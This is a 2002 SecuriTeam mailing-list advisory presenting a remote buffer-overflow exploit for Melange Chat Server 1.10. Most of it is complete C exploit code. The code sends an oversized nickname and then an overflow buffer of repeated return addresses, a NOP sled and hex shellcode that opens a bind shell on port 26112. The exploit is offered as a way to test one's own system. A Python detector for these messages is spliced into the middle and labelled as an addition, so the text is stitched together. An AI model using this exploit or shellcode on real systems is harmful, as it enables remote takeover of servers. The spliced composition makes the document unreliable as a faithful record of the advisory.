[EXPL] Melange Chat System Remote Exploit Code Released

From: support@securiteam.com
To: list@securiteam.com
Date: 25 Dec 2002 10:51:50 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Melange Chat System Remote Exploit Code Released
    ------------------------------------------------------------------------

    SUMMARY

     <http://melange.terminal.at/> Christian Walter's Melange Chat System is a
    chat client/server that provides an easy way to set up your own, powerful
    chat. A remotely exploitable buffer overflow in the product allows a
    remote attacker to completely compromise the server. The following is
    exploit code that can be used to test your own system for the mentioned
    vulnerability.

    DETAILS

    Exploit:
    /*
       Proof of Concept for Melange Chat Server 1.10
       a lame remote bof exploit by innerphobia <up2u_@hotmail.com> 12/24/02

       Credits go to:
       - iDefense Labs for the advisory
       - blink for discovering the bug
       - Irian for the shellcode

       With careful calculation it is *possible* to control even the EIP,
       not just one byte of EIP.
       There are a few things that will happen if we use a wrong ret address:
       1. Seg fault / shut down.
       2. Keep on going < nothing happens >.

       Code tested on Suse 8.0 and RH 7.3
       Merry Xmas :)
    */

    #include <stdio.h>
    #include <stdlib.h>      /* exit(), atoi() */
    #include <string.h>
    #include <stdint.h>      /* uint32_t */
    #include <unistd.h>      /* sleep(), close() */
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>  /* struct sockaddr_in, htons() */
    #include <netdb.h>

    // magic numbers begin here
    #define ADDR 0xbfffd490
    #define NICKLEN 49
    #define BUFFLEN 463
    // magic numbers end

    // brutally copied from Irian's cy.c
    char evil[]=
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x52\x50\xcd\x80\x43"
    "\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1\xb3\x04"
    "\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52"
    "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

    int main(int argc,char **argv){
        int i,j=0,sock,port = 6666;
        char *host;
        char nick[NICKLEN],buff[BUFFLEN];
        struct hostent *htent;
        struct sockaddr_in serv_addr;
        long jump = ADDR;
        uint32_t *ptr = (uint32_t *)buff;   /* 4-byte words, as the i+=4 loop below assumes */

        if(argc>4||argc<2)
            printf("Usage : %s [hostname] [ret address in hex (0x41414141)] [port]\n",argv[0]),exit(1);

        host=argv[1];
        if(argc>2) sscanf(argv[2],"0x%lx",&jump);
        if(argc>3) port=atoi(argv[3]);

        if((htent = gethostbyname(argv[1])) != NULL && (sock = socket(AF_INET,SOCK_STREAM,0)) != -1){

            serv_addr.sin_family = AF_INET;
            memcpy((char *)&serv_addr.sin_addr.s_addr,htent->h_addr_list[0],htent->h_length);
            serv_addr.sin_port = htons(port);

            if(!connect(sock,(struct sockaddr *)&serv_addr,sizeof(serv_addr))){

                printf("Connected to %s at %d [0x%lx]\nTrying to send %d chars NICKNAME\n",
                       host,port,jump,(int)(sizeof(nick)-6));

                // first message: "/NICK " followed by a run of 'A's
                memset(nick,'A',sizeof(nick)),memcpy(nick,"/NICK ",6);

                if(send(sock,nick,sizeof(nick),0) == -1)
                    perror("Sending nickname failed\n"),exit(1);
                sleep(1);

                // second message: buffer filled with the ret address, then NOP sled and shellcode
                for(i=0;i<sizeof(buff);i+=4) *(ptr++)=jump;
                for(i=0;i<sizeof(buff)-200-strlen(evil);i++) buff[i]=0x90;
                for(j=0;j<strlen(evil);j++) buff[i++]=evil[j];

                printf("Trying to send overflow string\n");

                if(send(sock,buff,sizeof(buff),0) == -1)
                    perror("Sending overflow failed :(\n"),exit(1);

                sleep(1);
                printf("Now try to connect to host : %s port : 26112\n",host);
                close(sock);
            }
            else printf("Can't connect to %s at %d\n",host,port),exit(1);
        }
        return 0;
    }
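    A defender-side counterpart, added here and not part of the advisory or of the Melange project: a small Python check that flags the two messages the exploit above sends (an oversized /NICK argument, then a buffer built from a repeated return address and a 0x90 NOP sled). The thresholds and the sample messages are constructed for this example; the sample layout follows the exploit's NICKLEN, BUFFLEN and ADDR constants, with a neutral filler standing in for the shellcode.

```python
import re

# Thresholds are assumptions for this example, not values from the advisory.
NICK_CMD = b"/NICK "
MAX_NICK = 16            # assumed sane nickname length for a chat server
NOP_RUN_THRESHOLD = 32   # a long run of 0x90 (x86 NOP) is a classic sled
REPEAT_THRESHOLD = 8     # one 4-byte word repeated many times looks like an address spray


def nop_sled_length(data: bytes) -> int:
    """Return the length of the longest run of 0x90 bytes in data."""
    return max((m.end() - m.start() for m in re.finditer(rb"\x90+", data)), default=0)


def repeated_word_count(data: bytes) -> int:
    """Return the highest repeat count of any 4-byte-aligned word in data."""
    counts = {}
    for off in range(0, len(data) - 3, 4):
        word = data[off:off + 4]
        counts[word] = counts.get(word, 0) + 1
    return max(counts.values(), default=0)


def inspect_message(data: bytes) -> dict:
    """Flag a client message that carries the exploit's tell-tale structure."""
    findings = []
    if data.startswith(NICK_CMD):
        nick = data[len(NICK_CMD):].rstrip(b"\r\n")
        if len(nick) > MAX_NICK:
            findings.append(f"oversized nickname: {len(nick)} bytes")
    sled = nop_sled_length(data)
    if sled >= NOP_RUN_THRESHOLD:
        findings.append(f"NOP sled: {sled} bytes of 0x90")
    repeats = repeated_word_count(data)
    if repeats >= REPEAT_THRESHOLD:
        findings.append(f"4-byte word repeated {repeats} times (address spray)")
    return {"suspicious": bool(findings), "findings": findings}


# Constructed samples mirroring the exploit's two sends (sizes from its NICKLEN,
# BUFFLEN and ADDR constants); the shellcode itself is replaced by a neutral filler.
SAMPLE_NICK = NICK_CMD + b"A" * (49 - len(NICK_CMD))
RET_WORD = (0xbfffd490).to_bytes(4, "little")
FILLER = bytes(range(78))                     # stand-in for the 78-byte shellcode
PREFILL = (RET_WORD * 116)[:463]              # exploit first fills the buffer with ADDR
SLED = b"\x90" * (463 - 200 - len(FILLER))    # 185 NOPs, as the exploit computes it
SAMPLE_OVERFLOW = SLED + FILLER + PREFILL[len(SLED) + len(FILLER):]
SAMPLE_BENIGN = b"/NICK alice\r\n"

if __name__ == "__main__":
    for name, msg in [("nick", SAMPLE_NICK), ("overflow", SAMPLE_OVERFLOW), ("benign", SAMPLE_BENIGN)]:
        print(name, inspect_message(msg))
```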

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:up2u_@hotmail.com>
    Innerphobia.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


